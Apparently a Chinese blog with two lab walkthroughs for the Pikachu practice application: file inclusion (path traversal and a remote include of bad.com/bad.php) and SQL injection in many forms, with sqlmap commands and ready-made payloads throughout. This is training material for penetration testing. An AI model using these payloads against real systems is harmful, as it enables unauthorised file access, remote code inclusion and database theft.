发表更新penetration Test / train3 分钟读完 (大约377个字)

something about Pikachu - File Inclusion

pikachu

pikachu => 备份地址

File Inclusion

概述

各种开发语言都提供了内置的文件包含函数,使得开发人员可以在一个代码文件中包含(引入)另外一个代码文件。 PHP中提供了include()include_once()require()require_once()等函数。

当要包含的目标文件名被定义为变量,并期待前端用户传递此变量,若没有做够安全考虑,会引发文件包含漏洞

文件包含漏洞分为:

  • 本地文件包含漏洞

    仅能对服务器本地文件进行包含,由于包含文件并不受攻击者控制,因此更大可能是包含一些系统配置文件,进而读取系统敏感 信息。
    本地文件包含漏洞文件上传漏洞结合时,变相实现了包含任意文件的功能,危害更大。

  • 远程文件包含漏洞

    能够通过URL包含远程文件,因此可以包含任意文件,危害很大。

File Inclusion(local)

构造请求,包含指定文件。关于服务器文件路径,可以尝试利用命令执行漏洞来获取。

1
/pikachu/vul/fileinclude/fi_local.php?filename=../../../../bitnami.css&submit=Submit+Query

File Inclusion(remote)

构造请求,包含远程文件。

1
/pikachu/vul/fileinclude/fi_remote.php?filename=http://bad.com/bad.php&submit=Submit+Query
 
发表更新penetration Test / train9 分钟读完 (大约1393个字)

something about Pikachu - SQL-Inject

pikachu

pikachu => 备份地址

SQL-Inject

概述

SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台进行处理时,未对数据做严格的判断,导致传入的恶意内容拼接 到SQL语句中,被当做SQL语句的一部分执行,从而导致数据库受损。

  • 防范SQL注入策略

    • 对前端传递来的数据进行过滤,不允许危险字符传入

    • 使用参数化查询的方式(Parameterized Query/Parameterized Statement)

    • 目前很多ORM框架也提供了SQL拼接方式查询,使用时需要注意

数字型注入(post)

  • 手动注入

    使用burpsuite抓到包后,在请求参数后添加boolean为真的语句。观察是否检索结果有不同。
    全部结果检索出来,SQL注入成功。

    1
    id=2 or true#&submit=%E6%9F%A5%E8%AF%A2

  • sqlmap

    使用burpsuite抓包后将请求信息保存至文件,由sqlmapid进行注入。

    1
    sqlmap -r number.txt --level=5 --risk=3 -p id --dbs --batch

字符型注入(get)

  • 手动注入

    使用burpsuite抓到包后,在请求参数后添加boolean为真的语句。观察是否检索结果有不同。
    值得注意的是,由于GET参数拼接在URL中,因此最好将注入的内容进行URL编码。

    1
    2
    3
    # + => 空格
    # %23 => #
    /pikachu/vul/sqli/sqli_str.php?name=vience'or+true%23&submit=%E6%9F%A5%E8%AF%A2

  • sqlmap

    使用burpsuite抓包后将请求信息保存至文件,由sqlmap进行对name进行注入。

    1
    sqlmap -r charsequence.txt --level=5 --risk=3 -p name --dbs --batch

搜索型注入

  • 手动注入

    字符型注入相同。

    1
    /pikachu/vul/sqli/sqli_search.php?name=vi'or+true%23&submit=%E6%90%9C%E7%B4%A2

  • sqlmap

    使用burpsuite抓包后将请求信息保存至文件,由sqlmap进行对name进行注入。

    1
    sqlmap -r search.txt --level=5 --risk=3 -p name --dbs --batch

xx型注入

  • 手动注入

    字符型注入相同。

    1
    /pikachu/vul/sqli/sqli_x.php?name=hello'or+true%23&submit=%E6%9F%A5%E8%AF%A2

    经尝试,会报SQL错误,因此可能是SQL语句未闭合。

    1
    /pikachu/vul/sqli/sqli_x.php?name=hello')or+true%23&submit=%E6%9F%A5%E8%AF%A2

  • sqlmap

    字符型注入相同。

    1
    sqlmap -r xx.txt --level=5 --risk=3 -p name --dbs --batch

    得到payload为有)的闭合语句。

    1
    name=hello') AND 7065=(SELECT (CASE WHEN (7065=7065) THEN 7065 ELSE (SELECT 1143 UNION SELECT 7507) END))-- -&submit=%E6%9F%A5%E8%AF%A2

insert/update注入

可以应用报错注入。获得关心的信息。
此次利用了updatexml(xml_document, XPath, new_Value)函数中,XPath中不可包含~字符,因此使用0x7e时,一定会报错。 当程序开启了报错打印后,报错信息就会显示在页面上。

1
2
3
4
# 构造insert into table(name, passwd)values('ABC', '123'); 中`ABC`为以下内容
# name' or updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir), 0)or'
# 构造的URL完整参数部分
username=name' or updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir), 0)or'&password=123&sex=&phonenum=&email=&add=&submit=submit

得到结果XPATH syntax error: '~pikachu~pikachu@localhost~C:\xa'

delete注入

insert/update注入相同,使用报错注入。

构造对应URL。

1
2
3
4
5
# URLencode
# %40 ==> @
# %23 ==> #
# /pikachu/vul/sqli/sqli_del.php?id=updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),0)#
/pikachu/vul/sqli/sqli_del.php?id=updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,%40%40datadir),0)%23

得到结果XPATH syntax error: '~pikachu~pikachu@localhost~C:\xa'

http header注入

尝试对HTTP头进行修改后发包,发现会有SQL报错,因此对HTTP头的属性进行注入。
此次对User-Agent进行注入。

1
User-Agent: 'or updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),0)or'#

得到结果XPATH syntax error: '~pikachu~pikachu@localhost~C:\xa'

盲注(base on boolean)

  • 手动注入

    针对name做注入,值得注意的是,pikachu对返回件数有判断,因此使用limit语句限制返回件数。

    1
    2
    # # => %23
    /pikachu/vul/sqli/sqli_blind_b.php?name=hello'+or+true+limit+1%23&submit=%E6%9F%A5%E8%AF%A2

  • sqlmap

    字符型注入相同。

    1
    sqlmap -r boolean.txt --level=5 --risk=3 -p name --dbs --batch

    得到报错payload

    1
    2
    # 需要自行`URLencode`,注意`name=`中的`=`不要`encode`
    name=hello'||(SELECT 0x6e6b7342 WHERE 6588=6588 AND (SELECT 7080 FROM(SELECT COUNT(*),CONCAT(0x7176767a71,(SELECT (ELT(7080=7080,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&submit=%E6%9F%A5%E8%AF%A2

盲注(base on time)

  • 手动注入

    针对name注入,基于时间盲注,查看页面响应时间。

    1
    2
    # 检索时等待5s
    /pikachu/vul/sqli/sqli_blind_t.php?name=kobe'+and+sleep(5)%23&submit=%E6%9F%A5%E8%AF%A2

    基于时间的盲注一般与if分支结合。

    if(condition, case1, case2)意为:

    1
    2
    3
    4
    5
    if condition
        case1
    else
        case2
    endif

    当数据库的名称首字母为a时,页面等待5s,否则正常。
    数据库的名字为pikachu,与a不相等,因此正常响应。

    1
    2
    # if(substr(database(),1,1)='a',sleep(5),null)
    /pikachu/vul/sqli/sqli_blind_t.php?name=kobe'+and+if(substr(database(),1,1)%3d'a',sleep(5),null)%23&submit=%E6%9F%A5%E8%AF%A2

    当数据库的名称首字母为p时,页面等待5s,否则正常。
    此次响应等待了5s,因此可以判断数据库的名字的首字母为p

    1
    2
    # if(substr(database(),1,1)='p',sleep(5),null)
    /pikachu/vul/sqli/sqli_blind_t.php?name=kobe'+and+if(substr(database(),1,1)%3d'p',sleep(5),null)%23&submit=%E6%9F%A5%E8%AF%A2

宽字节注入

  • 手动注入

    针对name注入。

    1
    2
    # 单引号前增加`%df`
    name=hello%df%27or+true%23&submit=%E6%9F%A5%E8%AF%A2
 

归档

×